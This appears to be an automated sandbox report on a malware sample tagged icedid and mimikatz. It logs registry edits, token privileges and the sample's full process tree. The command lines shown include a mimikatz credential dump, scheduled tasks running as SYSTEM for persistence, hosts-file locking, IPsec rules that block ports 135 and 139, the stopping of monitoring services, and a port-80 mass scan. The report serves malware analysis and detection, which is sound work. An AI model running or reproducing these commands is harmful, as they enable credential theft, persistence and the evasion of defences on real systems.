\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zzahwermh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kcyycg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbhcwec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3300 cmd.exe 3560 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00070000000234d9-6.dat nsis_installer_2 behavioral2/files/0x00080000000234ea-15.dat nsis_installer_1 behavioral2/files/0x00080000000234ea-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" bbhcwec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bbhcwec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" bbhcwec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bbhcwec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" bbhcwec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" bbhcwec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" bbhcwec.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3560 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3780 schtasks.exe 3732 schtasks.exe 4584 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1884 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1884 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1552 bbhcwec.exe Token: SeDebugPrivilege 4940 bbhcwec.exe Token: SeDebugPrivilege 2532 vfshost.exe Token: SeDebugPrivilege 3720 bculvvitc.exe Token: SeLockMemoryPrivilege 312 zcppya.exe Token: SeLockMemoryPrivilege 312 zcppya.exe Token: SeDebugPrivilege 512 bculvvitc.exe Token: SeDebugPrivilege 4896 bculvvitc.exe Token: SeDebugPrivilege 4868 bculvvitc.exe Token: SeDebugPrivilege 4880 bculvvitc.exe Token: SeDebugPrivilege 3676 bculvvitc.exe Token: SeDebugPrivilege 2572 bculvvitc.exe Token: SeDebugPrivilege 1076 bculvvitc.exe Token: SeDebugPrivilege 2920 bculvvitc.exe Token: SeDebugPrivilege 1384 bculvvitc.exe Token: SeDebugPrivilege 1500 bculvvitc.exe Token: SeDebugPrivilege 4300 bculvvitc.exe Token: SeDebugPrivilege 1608 bculvvitc.exe Token: SeDebugPrivilege 4008 bculvvitc.exe Token: SeDebugPrivilege 4232 bculvvitc.exe Token: SeDebugPrivilege 2168 bculvvitc.exe Token: SeDebugPrivilege 4392 bculvvitc.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1884 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe 1884 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe 1552 bbhcwec.exe 1552 bbhcwec.exe 4940 bbhcwec.exe 4940 bbhcwec.exe 3616 xohudmc.exe 4932 kcyycg.exe 3288 bbhcwec.exe 3288 bbhcwec.exe 412 bbhcwec.exe 412 bbhcwec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1884 wrote to memory of 3300 1884 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe 84 PID 1884 wrote to memory of 3300 1884 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe 84 PID 1884 wrote to memory of 3300 1884 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe 84 PID 3300 wrote to memory of 3560 3300 cmd.exe 87 PID 3300 wrote to memory of 3560 3300 cmd.exe 87 PID 3300 wrote to memory of 3560 3300 cmd.exe 87 PID 3300 wrote to memory of 1552 3300 cmd.exe 93 PID 3300 wrote to memory of 1552 3300 cmd.exe 93 PID 3300 wrote to memory of 1552 3300 cmd.exe 93 PID 4940 wrote to memory of 4880 4940 bbhcwec.exe 95 PID 4940 wrote to memory of 4880 4940 bbhcwec.exe 95 PID 4940 wrote to memory of 4880 4940 bbhcwec.exe 95 PID 4880 wrote to memory of 4420 4880 cmd.exe 97 PID 4880 wrote to memory of 4420 4880 cmd.exe 97 PID 4880 wrote to memory of 4420 4880 cmd.exe 97 PID 4880 wrote to memory of 4560 4880 cmd.exe 98 PID 4880 wrote to memory of 4560 4880 cmd.exe 98 PID 4880 wrote to memory of 4560 4880 cmd.exe 98 PID 4880 wrote to memory of 1788 4880 cmd.exe 99 PID 4880 wrote to memory of 1788 4880 cmd.exe 99 PID 4880 wrote to memory of 1788 4880 cmd.exe 99 PID 4880 wrote to memory of 3256 4880 cmd.exe 100 PID 4880 wrote to memory of 3256 4880 cmd.exe 100 PID 4880 wrote to memory of 3256 4880 cmd.exe 100 PID 4880 wrote to memory of 3028 4880 cmd.exe 101 PID 4880 wrote to memory of 3028 4880 cmd.exe 101 PID 4880 wrote to memory of 3028 4880 cmd.exe 101 PID 4880 wrote to memory of 3440 4880 cmd.exe 102 PID 4880 wrote to memory of 3440 4880 cmd.exe 102 PID 4880 wrote to memory of 3440 4880 cmd.exe 102 PID 4940 wrote to memory of 2392 4940 bbhcwec.exe 106 PID 4940 wrote to memory of 2392 4940 bbhcwec.exe 106 PID 4940 wrote to memory of 2392 4940 bbhcwec.exe 106 PID 4940 wrote to memory of 60 4940 bbhcwec.exe 108 PID 4940 wrote to memory of 60 4940 bbhcwec.exe 108 PID 4940 wrote to memory of 60 4940 bbhcwec.exe 108 PID 4940 wrote to memory of 1572 4940 bbhcwec.exe 110 PID 4940 wrote to memory of 1572 4940 bbhcwec.exe 110 PID 4940 wrote to memory of 1572 4940 bbhcwec.exe 110 PID 4940 wrote to memory of 3392 4940 bbhcwec.exe 114 PID 4940 wrote to memory of 3392 4940 bbhcwec.exe 114 PID 4940 wrote to memory of 3392 4940 bbhcwec.exe 114 PID 3392 wrote to memory of 4716 3392 cmd.exe 116 PID 3392 wrote to memory of 4716 3392 cmd.exe 116 PID 3392 wrote to memory of 4716 3392 cmd.exe 116 PID 4716 wrote to memory of 2200 4716 wpcap.exe 117 PID 4716 wrote to memory of 2200 4716 wpcap.exe 117 PID 4716 wrote to memory of 2200 4716 wpcap.exe 117 PID 2200 wrote to memory of 3180 2200 net.exe 119 PID 2200 wrote to memory of 3180 2200 net.exe 119 PID 2200 wrote to memory of 3180 2200 net.exe 119 PID 4716 wrote to memory of 3916 4716 wpcap.exe 120 PID 4716 wrote to memory of 3916 4716 wpcap.exe 120 PID 4716 wrote to memory of 3916 4716 wpcap.exe 120 PID 3916 wrote to memory of 4932 3916 net.exe 122 PID 3916 wrote to memory of 4932 3916 net.exe 122 PID 3916 wrote to memory of 4932 3916 net.exe 122 PID 4716 wrote to memory of 5060 4716 wpcap.exe 123 PID 4716 wrote to memory of 5060 4716 wpcap.exe 123 PID 4716 wrote to memory of 5060 4716 wpcap.exe 123 PID 5060 wrote to memory of 1104 5060 net.exe 125 PID 5060 wrote to memory of 1104 5060 net.exe 125 PID 5060 wrote to memory of 1104 5060 net.exe 125 PID 4716 wrote to memory of 1180 4716 wpcap.exe 126
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2136
-
C:\Windows\TEMP\htizhpqtw\zcppya.exe"C:\Windows\TEMP\htizhpqtw\zcppya.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:312
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rgmymecw\bbhcwec.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3560
-
-
C:\Windows\rgmymecw\bbhcwec.exeC:\Windows\rgmymecw\bbhcwec.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1552
-
-
-
C:\Windows\rgmymecw\bbhcwec.exeC:\Windows\rgmymecw\bbhcwec.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4420
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3440
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2392
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:60
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1572
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nlmyhmmcu\ycmckpemz\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\nlmyhmmcu\ycmckpemz\wpcap.exeC:\Windows\nlmyhmmcu\ycmckpemz\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3180
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4932
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:1104
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1180
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4452
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3560 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2960 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:636
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4500 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4764
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nlmyhmmcu\ycmckpemz\cgpziiqcb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nlmyhmmcu\ycmckpemz\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3220 -
C:\Windows\nlmyhmmcu\ycmckpemz\cgpziiqcb.exeC:\Windows\nlmyhmmcu\ycmckpemz\cgpziiqcb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nlmyhmmcu\ycmckpemz\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nlmyhmmcu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nlmyhmmcu\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4232 -
C:\Windows\nlmyhmmcu\Corporate\vfshost.exeC:\Windows\nlmyhmmcu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "teywunqcq" /ru system /tr "cmd /c C:\Windows\ime\bbhcwec.exe"2⤵
- System Location Discovery: System Language Discovery
PID:8 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "teywunqcq" /ru system /tr "cmd /c C:\Windows\ime\bbhcwec.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nghcwkyek" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rgmymecw\bbhcwec.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nghcwkyek" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rgmymecw\bbhcwec.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wvigymlyb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\htizhpqtw\zcppya.exe /p everyone:F"2⤵PID:2272
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "wvigymlyb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\htizhpqtw\zcppya.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4584
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1008
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3980
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4960
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1452
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4316
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2180
